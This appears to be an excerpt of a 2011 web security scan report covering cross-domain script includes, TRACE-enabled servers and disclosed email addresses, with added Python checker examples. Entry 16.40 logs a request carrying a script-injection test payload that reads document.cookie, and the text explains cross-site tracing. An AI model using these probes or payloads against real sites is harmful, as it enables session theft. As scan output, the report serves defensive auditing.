Host: jobs.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSb35b189ffa137f2f4ba6e0ebbe3d6f9c=e8b60e479e4f64320ce8065cb6d3ca23; expires=Fri, 29-Jul-2011 15:10:31 GMT; path=/; domain=.jobs.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:37:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_3374eb497ebd53f80f03b51776636451.js"></script>
<script type="text/javascript" src="http://developers.diggstatic.com/sites/all/modules/jobvite/js/widget20.js?9"></script>
...[SNIP]...
<!-- /#page-inner, /#page -->


<script type="text/javascript" src="http://developers.diggstatic.com/sites/all/modules/jobvite/js/source.js?9"></script>
...[SNIP]...

16.33. http://jquery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain (visible in the response excerpt below):

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 30 Jun 2011 18:32:40 GMT
ETag: "7880006-348e-203ce200"
Accept-Ranges: bytes
Content-Length: 13454
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

16.34. http://jquery.malsup.com/cycle/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.malsup.com
Path:   /cycle/

Issue detail

The response dynamically includes the following scripts from other domains (visible in the response excerpt below):

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://malsup.github.com/chili-1.7.pack.js
http://malsup.github.com/jquery.cycle.all.js
http://malsup.github.com/jquery.easing.1.3.js
http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js
http://www.google-analytics.com/urchin.js

Request

GET /cycle/ HTTP/1.1
Host: jquery.malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:36 GMT
Server: mod_security2/2.5.7
Last-Modified: Mon, 09 May 2011 12:21:31 GMT
ETag: "10cdf89-1efb-4a2d6e12768c0"
Accept-Ranges: bytes
Content-Length: 7931
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.cycle.all.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.35. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain (visible in the response excerpt below):

http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15514

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

16.36. http://jqueryui.com/themeroller/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The response dynamically includes the following scripts from other domains (visible in the response excerpt below):

http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js
http://static.jquery.com/ui/themeroller/scripts/app.js

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 119983

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Shadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...

16.37. http://malsup.com/jquery/cycle/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/cycle/

Issue detail

The response dynamically includes the following scripts from other domains (visible in the response excerpt below; the page is byte-identical to 16.34, as the ETag and Content-Length show):

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://malsup.github.com/chili-1.7.pack.js
http://malsup.github.com/jquery.cycle.all.js
http://malsup.github.com/jquery.easing.1.3.js
http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js
http://www.google-analytics.com/urchin.js

Request

GET /jquery/cycle/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:26 GMT
Server: mod_security2/2.5.7
Last-Modified: Mon, 09 May 2011 12:21:31 GMT
ETag: "10cdf89-1efb-4a2d6e12768c0"
Accept-Ranges: bytes
Content-Length: 7931
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.cycle.all.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.38. http://medienfreunde.com/lab/innerfade/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /lab/innerfade/

Issue detail

The response dynamically includes the following script from another domain, at five separate points in the page (visible in the response excerpt below):

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<!-- saved from url=(0013)about:internet -->
   <hea
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...
</script>
                   <script type="text/javascript"
                    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

   </script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...

16.39. http://pubads.g.doubleclick.net/gampad/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The response dynamically includes the following script from another domain (visible in the response excerpt below, where the full query string, which carries the DoubleClick click-through URL, is shown):

http://bs.serving-sys.com/BurstingPipe/adServer.bs

Request

GET /gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFRight&page_slots=Bebo_Home_300x250_ATFLeft%2CBebo_Home_300x250_ATFRight&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296837&cc=95&biw=1057&bih=822&ifi=2&adk=262378141&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:21:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 3044
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBaHBaQUUUTqvdE5LslQeKyOj8D63mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCyhHAAgXIApWysAvgAgDqAhpCZWJvX0hvbWVfMzAweDI1MF9BVEZSaWdodKgDAegDwgToA9MB6AP4A_UDAACAweAEAYAGz6SZ7NvQ-unMAQ%26num%3D1%26sig%3DAGiWqty8BvNy85dWZZPNztI-FtGBFXWVVg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1byw2Ns0IjI43jQ_2znd1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgDDUBk0%2526redirectURL%253D&ord=ThRFQQAE7qsK5XYS_5okCg==&ucm=true"></script>
...[SNIP]...

16.40. http://pubads.g.doubleclick.net/gampad/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The response dynamically includes the following script from another domain (visible in the response excerpt below):

http://pagead2.googlesyndication.com/pagead/js/r20110622/r20110627/abg.js

Request

GET /gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_160x600&page_slots=Bebo_ROS_ATF_728x90%2CBebo_ROS_ATF_160x600&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961842&dt=1309961842849&cc=100&oe=utf-8&biw=1148&bih=723&ifi=2&adk=4030190938&u_tz=-300&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bebo.com/c/invite8281a'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea91f426563e/join
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pubads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 14:17:24 GMT
Server: cafe
Cache-Control: private
Content-Length: 4576
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110622/r20110627/abg.js"></script>
...[SNIP]...
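The check behind entries 16.27 to 16.40 is passive: the scanner parses each HTML response and reports every script element whose src points at a host other than the one that served the page. The Python below is an added example of that check, not code from the scanner or from any of the sites listed above. It assumes exact host comparison (so a script from static.jquery.com on a jqueryui.com page counts as cross-domain, as in 16.36), resolves relative and protocol-relative src values against the request URL, and runs on a sample body constructed from the script tags in the 16.34 response plus two same-host includes that must not be reported.

```python
"""Cross-domain script include check (added example for entries 16.27-16.40).

Given the URL a response was fetched from and its HTML body, list every
<script src> whose host differs from the responding host.  Relative URLs
resolve against the request URL and are therefore same-host; absolute and
protocol-relative (//host/...) URLs are compared by host.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collect the raw src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def cross_domain_scripts(request_url, html):
    """Return absolute URLs of scripts loaded from a host other than the request host.

    Order of first appearance is kept and exact duplicates are dropped, so a page
    that includes the same third-party file five times (as 16.38 does) reports it once.
    """
    own_host = urlsplit(request_url).hostname.lower()
    parser = _ScriptSrcCollector()
    parser.feed(html)
    seen, found = set(), []
    for src in parser.srcs:
        absolute = urljoin(request_url, src)   # resolves relative and //host forms
        host = urlsplit(absolute).hostname
        if host is None or host.lower() == own_host:
            continue                           # same host as the page: not a third-party include
        if absolute not in seen:
            seen.add(absolute)
            found.append(absolute)
    return found


# Constructed sample body: three script tags seen in the 16.34 response, a
# protocol-relative duplicate of one of them, plus a relative and a same-host
# include that must not be reported.
SAMPLE_URL = "http://jquery.malsup.com/cycle/"
SAMPLE_HTML = """
<html><head>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.cycle.all.js"></script>
<script type="text/javascript" src="//malsup.github.com/jquery.cycle.all.js"></script>
<script src="/local/site.js"></script>
<script src="http://jquery.malsup.com/other.js"></script>
</head><body>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
</body></html>
"""

if __name__ == "__main__":
    for url in cross_domain_scripts(SAMPLE_URL, SAMPLE_HTML):
        print(url)
```

Run against the sample it prints the googleapis, malsup.github.com and google-analytics URLs and nothing else. Whether a sibling host such as static.jquery.com should count as "another domain" is a policy decision; the exact-host rule used here is the stricter one and matches what the entries above report.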

17. TRACE method is enabled
There are 4 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If it is enabled, the web server answers a TRACE request by echoing back the exact request it received, as a body of type message/http (as in the four responses below), including any headers that were added by intermediaries on the way to the origin.

This behaviour is harmless in itself, but it can sometimes be leveraged against other application users. If an attacker can cause a user's browser to issue a TRACE request and can read the response, the attacker captures whatever sensitive data the browser attached to that request, such as session cookies or credentials for platform-level authentication; this is cross-site tracing (XST), and it can exacerbate other issues such as cross-site scripting. Two practical caveats. First, current browsers refuse to issue TRACE from script (XMLHttpRequest and fetch treat it as a forbidden method), so XST needs a non-browser client or a browser bug. Second, the echo is informative on its own because it exposes what sits in front of the origin: 17.2 shows the request being forwarded by a CDN to an origin named media.digg.com with Via and X-Forwarded-For headers added on the way, and 17.1 and 17.4 show cookies (ADVIVA, traffic_control, d) that were not in the original request but were appended by an intermediary before the origin saw it.

Issue remediation

The TRACE method should be disabled on the web server and on anything in front of it, since 17.2 shows a CDN passing TRACE straight through to the origin. On Apache httpd 2.2 and later the directive is TraceEnable off; on older builds the method can be rejected with a mod_rewrite rule on REQUEST_METHOD. nginx, which several of the hosts in section 16 run, does not implement TRACE and answers it with 405. After the change, re-send the raw request shown in each entry and confirm the response is no longer 200 with a message/http body.
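The active check behind entries 17.1 to 17.4, as an added example that is not code from the scanner: a raw TRACE / HTTP/1.0 request is sent on a plain socket with a throwaway Cookie header, and the probe reports TRACE as enabled only when the status is 200, the Content-Type is message/http, and the body echoes both the request line and the marker cookie. So that it runs offline, the example also constructs a small local http.server with a do_TRACE handler that behaves like the misconfigured hosts above, and a second handler without one that behaves like a hardened host (Python's BaseHTTPRequestHandler answers an unimplemented method with 501). The host names, ports and cookie value are placeholders chosen for the example.

```python
"""TRACE probe (added example for issue 17), with a local stand-in server.

trace_enabled() sends a raw TRACE request and checks for the signature the
entries above share: HTTP 200, Content-Type message/http, and a body that
echoes the request line together with a marker header we sent.
"""
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

MARKER_COOKIE = "Cookie: 50e06ad4db9bac49"   # throwaway value; if it comes back, headers are echoed


def trace_enabled(host, port, timeout=5.0):
    """Return (enabled, body) for a raw TRACE / HTTP/1.0 against host:port."""
    request = (
        "TRACE / HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        f"{MARKER_COOKIE}\r\n"
        "\r\n"
    ).encode("ascii")
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:                      # HTTP/1.0: the server closes after one response
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    raw = b"".join(chunks).decode("latin-1")
    head, _, body = raw.partition("\r\n\r\n")
    status_line = head.split("\r\n", 1)[0]
    echoed = body.startswith("TRACE / HTTP/1.") and MARKER_COOKIE.lower() in body.lower()
    enabled = " 200 " in status_line and "content-type: message/http" in head.lower() and echoed
    return enabled, body


class _EchoingHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for a server with TRACE enabled: echoes the request as message/http."""
    protocol_version = "HTTP/1.0"

    def do_TRACE(self):
        payload = (self.requestline + "\r\n" + str(self.headers)).encode("latin-1")
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

    def log_message(self, *args):        # keep the example quiet
        pass


class _HardenedHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for a hardened server: no do_TRACE, so the method gets 501."""
    protocol_version = "HTTP/1.0"

    def log_message(self, *args):
        pass


def _serve(handler):
    """Start handler on an ephemeral loopback port in a daemon thread; return (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def demo():
    """Probe both stand-in servers; return {'echoing': True, 'hardened': False}."""
    verdicts = {}
    for name, handler in (("echoing", _EchoingHandler), ("hardened", _HardenedHandler)):
        server, port = _serve(handler)
        try:
            enabled, _ = trace_enabled("127.0.0.1", port)
        finally:
            server.shutdown()
            server.server_close()
        verdicts[name] = enabled
    return verdicts


if __name__ == "__main__":
    print(demo())
```

Against a real host, call trace_enabled(hostname, 80) and also inspect the returned body: as 17.2 and 17.4 show, the interesting material is often the headers and cookies an intermediary added rather than the fact of the echo itself.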


17.1. http://bp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: bp.specificclick.net
Cookie: 50e06ad4db9bac49

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 88
Date: Wed, 06 Jul 2011 15:39:03 GMT
Connection: close

TRACE / HTTP/1.0
host: bp.specificclick.net
cookie: 50e06ad4db9bac49; ADVIVA=NOTRACK

17.2. http://cdn1.diggstatic.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.diggstatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cdn1.diggstatic.com
Cookie: dd3b41a62c600328

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:22 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: dd3b41a62c600328
Accept-Encoding: gzip
Host: media.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.5
x-chpd-loop: 1
Via: 1.0 PXY029-ASHB.COTENDO.NET (chpd/4.01.0008.8)
Cneoncti
...[SNIP]...

17.3. http://crl.globalsign.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crl.globalsign.net
Path:   /

Request

TRACE / HTTP/1.0
Host: crl.globalsign.net
Cookie: f78f2f6839dcb285

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:21:34 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: crl.globalsign.net
Cookie: f78f2f6839dcb285


17.4. http://digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: digg.com
Cookie: 5362da617c8da351

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:14 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: digg.com
Cookie: 5362da617c8da351; traffic_control=f04100000060110000168986608%3A219%3A112; d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2
Connection: Keep-Alive
X-forwarded-for: 173.193.214.243


18. Email addresses disclosed
There are 26 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com). Triage accordingly: the digg.com addresses in 18.1 and 18.2 (support@, abuse@) are already role mailboxes of exactly the kind this remediation recommends, and the personal address in 18.3 is a blog commenter's, published as user-submitted content rather than leaked from the application or its developers. Matches inside minified scripts (18.4) are worth a second look, since they are usually vendor contact strings embedded in the library rather than the site's own staff.
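The check behind entries 18.1 onward, as an added example that is not the scanner's code: pull every address-shaped token out of a response body after undoing the two encodings that commonly hide the @ sign in HTML (entity encoding such as &#64; and percent encoding such as %40 inside a mailto: href), count occurrences, and split the result into role mailboxes and everything else so the remediation above can be applied. The ROLE_LOCAL_PARTS list and the sample body (assembled from the 18.2 and 18.3 excerpts, with a CSS at-rule and a version-style @ added as false-positive bait) are constructed for this example; the role list is a heuristic, not a standard.

```python
"""E-mail disclosure check (added example for issue 18)."""
import html
import re
from collections import Counter
from urllib.parse import unquote

# Local part, '@', one or more dotted labels, and an alphabetic top-level label.
# The lookarounds stop a match from starting or ending inside a longer token.
_EMAIL = re.compile(
    r"(?<![A-Za-z0-9._%+-])"
    r"[A-Za-z0-9._%+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}"
    r"(?![A-Za-z0-9-])"
)

# Heuristic: local parts that are generic mailboxes rather than a person's name.
ROLE_LOCAL_PARTS = {"abuse", "help", "helpdesk", "info", "noreply", "no-reply",
                    "postmaster", "sales", "security", "support", "webmaster"}


def find_emails(body):
    """Return a Counter of lower-cased addresses found in body.

    Percent decoding runs first (mailto:user%40host), then HTML entity decoding
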